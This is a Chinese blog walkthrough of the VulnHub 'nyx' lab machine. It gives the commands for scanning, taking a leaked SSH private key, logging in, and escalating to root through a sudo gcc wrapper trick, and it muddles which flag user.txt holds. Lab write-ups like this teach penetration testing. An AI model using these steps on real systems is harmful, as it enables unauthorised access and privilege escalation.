VuInHub之nyx靶机

于 2024-10-07 12:44:21 发布
阅读量156 收藏 4
点赞数 4
分类专栏: 靶场 文章标签: web安全 网络安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_82243198/article/details/142738446
版权

一.信息搜集

1.主机探测

发现靶机的地址为 192.168.247.208

2.端口扫描

nmap -sS -A -p- 192.168.247.208       //发现开放了22和80端口

3.漏洞扫描

nikto扫描发现了靶机的一些版本信息,包括一些漏洞

nikto -h 192.168.247.208

nmap漏洞扫描

nmap --script=vuln -p22,80 192.168.247.208

二.调试测试

1.web渗透+信息搜集

访问原页面

查看网页源代码并无有效信息

访问我们开始利用namp扫描出来的 那个目录:/d41d8cd98f00b204e9800998ecf8427e.php

发现是个open ssh私钥 我们后面可以尝试用openssh私钥进行免密码登录 ssh

2.我们将靶机的openssh私钥,保存到id_rsa文件里 后面利用这个私钥进行免密码登录

我们现在尝试寻找ssh登录的用户,在实际的渗透测试下,如果我们没有找到ssh私钥的用户,我们可以尝试下root用户,但是这个靶场不是root用户

ssh -i id_rsa root@192.168.247.208

返回页面 发现这个用户是mpampis的

私钥文件 “id_rsa” 的权限设置有问题。SSH 客户端要求私钥文件的权限必须是非常严格的,通常是 600 或者 400,表示只有拥有者才可读写。

chmod 600 id_rsa

利用其进行登录

ssh -i id_rsa mpampis@192.168.247.208 发现登录成功

3.user.txt 拿到root的flag

三.提权

1.sudo提权

cat /etc/crontab查看是否有定时进程,发现没有定时任务

cat /etc/crontab

查看哪些具有SUID提权

find / -user root -perm -4000 -print 2>/dev/null

sudo 命令通常用于赋予特定用户或用户组在系统上执行特权操作的权限,而 (root) NOPASSWD 说明了用户 mpampis 可以以 root 权限执行指定的命令而无需输入密码

sudo -l

2.利用gcc提权

sudo gcc -wrapper /bin/bash,-s .

3.root权限

发现成功提权到root权限了

饮长安千年月
关注
专栏目录
nyx_ui:NYX用户界面
05-22
Nyx用户界面介绍NYX平台是易于使用的应用程序构建器,它集成了各种技术,例如: 弹性搜寻/ Kibana PostGreSQL Jupyter笔记本节点红Apache ActiveMQ 阿帕奇骆驼NYX UI包含可以创建以下页面的在线配置工具: Kibana...
id_nyx_
09-29
Network detector in java language to detect unauthorized attacks
Nyx-开源
04-24
Nyx 是一个开源项目,它的核心是基于 CORBA(Common Object Request Broker Architecture)的 Linux 多媒体框架。这个框架的设计目标是为了提供一个可扩展、灵活且高性能的平台,用于处理多媒体数据,包括音频、视频...
hekate-ctcaer-6.1.1-Nyx-1.6.1.zip
06-05
hekate官方最新版本,官方正式版本,6.1.1版本(Nyx 1.6.1版本)。因GitHub下载较慢,转存于CSDN。 支持 HOS 18.0.0,修复了 pkg1 问题导致的库存启动失败,如果条件满足(T210B01 或 T210 无 autorcm),将重新启动...
2020-10_Nyx
03-18
Nyx原位采样工作流程此示例中的工作流程图。一个使用Nyx , Ascent , Cinema数据库的原位创建以及后处理分析的示例的存储库。此工作流程中嵌入的构建说明来自的Ascent构建说明。此工作流使用spack从特定的提交构建...
网络安全 网络安全的主要领域 安全威胁 防护技术 安全策略 未来趋势
weixin_42462436的博客
10-03 1396
随着智能手机和平板电脑的广泛使用,移动设备的安全(如数据加密、设备丢失保护等)也成为重点。由国家级或高级黑客组织发起的持续性、高度隐蔽的网络攻击,通常以窃取敏感信息为目的。使用加密、访问控制、数据备份等手段来保护信息免受未经授权的访问、修改或删除。包括防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等技术的使用。保证操作系统和相关服务的安全,包括权限控制、补丁管理、系统日志监控等。利用全球收集的安全信息和分析工具,提前识别并防御潜在的威胁。关注对虚拟化平台、API安全、数据隔离和访问管理的控制。
工业控制过等保三级需要的网络安全设备及详细讲解
weixin_59571541的博客
09-30 816
在工业控制系统(ICS)的安全性日益受到重视的背景下,网络安全等级保护(过等保)三级作为一种重要的安全标准,对保障工业控制系统的安全运行有着重要的意义。过等保三级主要针对那些对安全性要求较高的系统,如电力、石油、化工等关键基础设施,以下是实现过等保三级所需的主要网络安全设备及其详细讲解。
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 278
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
Web安全 - 文件上传漏洞(File Upload Vulnerability)
小工匠
10-02 1738
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-29 723
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1111
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全:保护您的数字世界
不迁怒,不贰过。小知识,大智慧。
09-29 1212
在当今数字化时代,网络安全已经成为每个人都应该关注的重要议题。随着互联网的普及和信息技术的快速发展,我们的个人信息、财务数据甚至国家安全都面临着来自网络的威胁。网络攻击日益猖獗,黑客利用漏洞和技术手段,威胁着我们的数字世界的安全。在这个信息爆炸的时代,数据的泄露和被篡改可能带来严重的后果,影响个人隐私、金融安全甚至国家稳定。因此,保护我们的数字世界免受网络攻击变得至关重要。本文将探讨网络安全的重要性,介绍网络安全的基本概念和最佳实践,帮助读者更好地了解如何保护自己在数字世界中的安全。让我们共同努力,建立一个
Web安全 - 构建全面的业务安全保护防御体系
小工匠
10-03 2058
业务安全是公司为了保护其业务流程和用户增长而制定的防护措施,主要应对的是黑产(黑色产业)的攻击。相比传统的基础安全,业务安全的特点更加复杂,主要体现在两个方面:攻击者的产业化和资源对抗。
源路由攻击及网络安全威胁总结
最新发布
wxtg1921的博客
10-06 566
源路由机制过程描述冒充信任IP地址实例实例结合嗅探与欺骗技术序列号机制寻找合适的攻击目标实例防范源路由欺骗防范信任关系欺骗防范会话劫持攻击实例ARP数据包ARP欺骗原理防范ARP欺骗实例实例防范实例工作原理欺骗过程实例过程实例源路由攻击与TCP会话劫持的关系ARP攻击与TCP会话劫持的关系电子邮件欺骗、DNS欺骗与Web欺骗的关系虽然上述攻击各有特点,但综合防范措施可以有效减少被攻击的风险:
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1067
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
网络安全(黑客)——自学2024
2401_84466325的博客
09-28 2670
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
选择网络安全模式启动Windows系统,解决PC无法连接网络问题
dvlinker的技术专栏
10-04 2354
选择网络安全模式启动Windows系统,解决PC无法连接网络问题。
Web安全 - 服务端请求伪造SSRF(Server-Side Request Forgery)
小工匠
09-29 1698
SSRF攻击的本质是利用服务器作为代理,发送请求到攻击者指定的目标(如内部网络资源、外部服务等),从而绕过客户端的防火墙、访问控制或认证机制。例如,代理在处理本地IP请求时,触发安全告警。若代理未能正确过滤和验证请求内容,攻击者可能通过代理访问不受控制的资源,或借助代理规避安全限制。:某些Web应用将对外服务作为身份验证的依赖(例如OAuth),SSRF攻击可以伪造服务器请求,以获取未授权的访问。:对所有代理请求使用安全令牌或密钥验证,并模拟攻击者尝试绕过验证过程,确保代理可以识别并阻止非法请求。
网络安全】内部应用中的多重漏洞利用
等风来
09-30 233
在最近的一次渗透测试中,我对一个仅供员工使用的内部应用程序进行了评估,重点关注身份验证和帐户管理功能。该应用程序允许用户通过电子邮件地址注册并验证帐户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值